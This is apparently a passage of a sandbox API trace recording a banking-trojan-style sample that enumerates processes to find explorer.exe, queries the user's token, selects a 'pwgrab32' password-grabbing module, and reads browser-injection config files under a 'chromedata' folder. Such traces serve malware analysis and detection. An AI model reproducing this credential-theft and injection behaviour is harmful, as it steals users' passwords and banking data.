	[0244.523] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.524] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.524] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.525] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.525] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.527] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.527] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.528] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.528] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.529] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.529] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.529] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.530] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.530] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0244.531] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.531] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.531] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.532] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0244.532] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.533] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0244.533] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.534] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.534] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.535] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0244.535] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.536] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0244.536] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.537] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0244.537] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.538] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0244.538] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.539] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0244.539] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.540] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0244.540] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.541] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0244.541] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.542] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0244.542] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.542] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0244.543] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.543] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0244.543] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.544] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0244.544] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.545] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0244.545] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.547] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0244.547] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.548] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0244.548] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.549] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0244.549] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.550] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0244.550] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.551] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0244.551] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.552] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0244.552] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.553] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0244.553] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.554] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0244.554] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.555] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0244.555] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.556] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0244.556] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.556] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0244.556] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.557] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0244.557] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.558] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.558] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.559] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.559] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.560] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.560] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.561] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.561] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.563] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0244.563] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.564] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.564] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.565] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.565] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.566] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0244.566] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.567] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0244.567] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.568] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0244.568] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.569] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.569] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.569] CloseHandle (hObject=0x66c) returned 1
	[0244.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1468
	[0244.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1810
	[0244.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311a50
	[0244.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x66c
	[0244.570] OpenProcessToken (in: ProcessHandle=0x66c, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x6ec) returned 1
	[0244.570] GetTokenInformation (in: TokenHandle=0x6ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0244.570] GetLastError () returned 0x7a
	[0244.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a67a0
	[0244.570] GetTokenInformation (in: TokenHandle=0x6ec, TokenInformationClass=0x1, TokenInformation=0x22a67a0, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a67a0, ReturnLength=0x128c98) returned 1
	[0244.570] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a67a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0244.570] CloseHandle (hObject=0x6ec) returned 1
	[0244.571] CloseHandle (hObject=0x66c) returned 1
	[0244.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa18
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1468) returned 1
	[0244.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfea0
	[0244.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1468
	[0244.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311840
	[0244.571] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0244.571] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0244.571] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0244.571] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0244.571] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0244.571] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311840) returned 1
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1468) returned 1
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1810) returned 1
	[0244.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0244.571] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0244.571] Sleep (dwMilliseconds=0x4e20) 
	[0244.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.610] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.610] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.610] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.610] CloseHandle (hObject=0x66c) returned 1
	[0244.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.610] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.611] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.611] CloseHandle (hObject=0x66c) returned 1
	[0244.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.611] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.611] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.611] CloseHandle (hObject=0x66c) returned 1
	[0244.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.611] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
